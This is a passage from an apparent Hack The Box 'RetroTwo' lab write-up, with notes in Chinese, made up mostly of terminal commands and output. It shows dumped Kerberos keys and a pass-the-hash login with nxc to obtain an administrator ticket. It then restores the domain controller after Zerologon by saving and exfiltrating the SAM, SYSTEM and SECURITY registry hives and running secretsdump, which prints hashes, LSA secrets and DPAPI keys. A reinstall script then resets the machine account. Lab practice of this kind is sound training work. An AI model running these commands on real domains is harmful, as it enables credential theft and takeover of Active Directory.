FS01$:aes256-cts-hmac-sha1-96:c2d3478014ac16cda2a093ffa710f57939ea47c022aa0bd4cec840b2fc313b42
FS01$:aes128-cts-hmac-sha1-96:260e51b22e8694ed4c8d229bb3f18aeb
FS01$:des-cbc-md5:85df2686e95bdf92
FS02$:aes256-cts-hmac-sha1-96:fcceafa1335a9e262a1e4532d516011d4e8b80ae7f35fb35714a2a6410db18bc
FS02$:aes128-cts-hmac-sha1-96:5f2c27f494ab454d875057c909790e3e
FS02$:des-cbc-md5:252afd385b04b0bf
[*] Cleaning up...
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo/zerologon]
└─# nxc smb BLN01.retro2.vl -u administrator -H c06552bdb50ada21a7c74536c231b848 --generate-tgt administrator
SMB 10.129.34.62 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.129.34.62 445 BLN01 [+] retro2.vl\administrator:c06552bdb50ada21a7c74536c231b848 (Pwn3d!)
SMB 10.129.34.62 445 BLN01 [+] TGT saved to: administrator.ccache
SMB 10.129.34.62 445 BLN01 [+] Run the following command to use the TGT: export KRB5CCNAME=administrator.ccache
3. Beyond Root (恢复DC)
zerologon会情况域控密码,可以使用下面的方式进行恢复
先用 wmiexec登录上去
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
lget system.save
lget sam.save
lget security.save
del /f system.save
del /f sam.save
del /f security.save
然后 Secrets dump
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo/zerologon]
└─# secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x2bafc8cdbfbf9f6255da170cc977275e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6e70d74e5d3c6f1cfd30048e53c398dd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:7cfe9e063c0f672319037c775682a08e24a6530b67b898e0d09a0d7fdb73046519e3b89c188a79f3fd17c812212e378725f09b3d9689e370759656b37c621a85bba9508e53007a03af337ed90be0cf7f19b26e047b0a1300d6836b9355806c89d3505a9698d80835174e2e5ecaaf33ec9263ea0760171522662d0760f7134ff743eeb932cbb0734240468e98a34a64eeac9833b58fe83d51562f558215b13ae8a754e0cb654f67a665e064ca41e6daa33bcc4dc87e0505116d5897a875557add1b78032f13bb332eee2dd23c37e6ade836cb5edf2a445943f3f7ab2f902286623f6ba1f5c4f6c8f236cd2d97362da53a
>>>> $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:53ca4f552054a60df7b6eb3816c8242f
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1f7e58016fd02f37fe1cfa38018e9e4092af070d
dpapi_userkey:0x86ad0f2f90872239d321ba068f3ef196094eee17
[*] NL$KM
0000 C4 2C C3 F9 BB 4F AE E2 08 E3 8E D8 4A DB A8 E6 .,...O......J...
0010 CC FB 15 71 EB 2D 85 DF 79 BA 08 92 5B E9 95 AC ...q.-..y...[...
0020 7A 4E 32 DB 94 17 55 39 C5 4B 9A C7 03 19 9B 3E zN2...U9.K.....>
0030 D8 AA 65 AD DE C3 9A E2 9B 8E DC E4 98 D6 5A 4A ..e...........ZJ
NL$KM:c42cc3f9bb4faee208e38ed84adba8e6ccfb1571eb2d85df79ba08925be995ac7a4e32db94175539c54b9ac703199b3ed8aa65addec39ae29b8edce498d65a4a
[*] Cleaning up...
重新安装原始HASH (过程有一点点久)
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo/zerologon]
└─# python reinstall_original_pw.py BLN01 10.129.34.62 53ca4f552054a60df7b6eb3816c8242f
Performing authentication attempts...
================================================================================================================================================================================================================================================================================================================================================================================================================
NetrServerAuthenticate3Response
ServerCredential:
Data: b'W\x8c\xf9]63)|'
NegotiateFlags: 556793855
AccountRid: 1001
ErrorCode: 0
server challenge b'W\x8b\x07\x93>g\x9fF'
session key b'\x8c-\xa9\xe4\x98}\x048K\xd0\x01P^\xb0\xe5p'
NetrServerPasswordSetResponse
ReturnAuthenticator:
Credential:
Data: b'\x01\xd9\xc5\xb2\x9dyA\xa9'
Timestamp: 0
ErrorCode: 0
Success! DC machine account should be restored to it's original value. You might want to secretsdump again to check.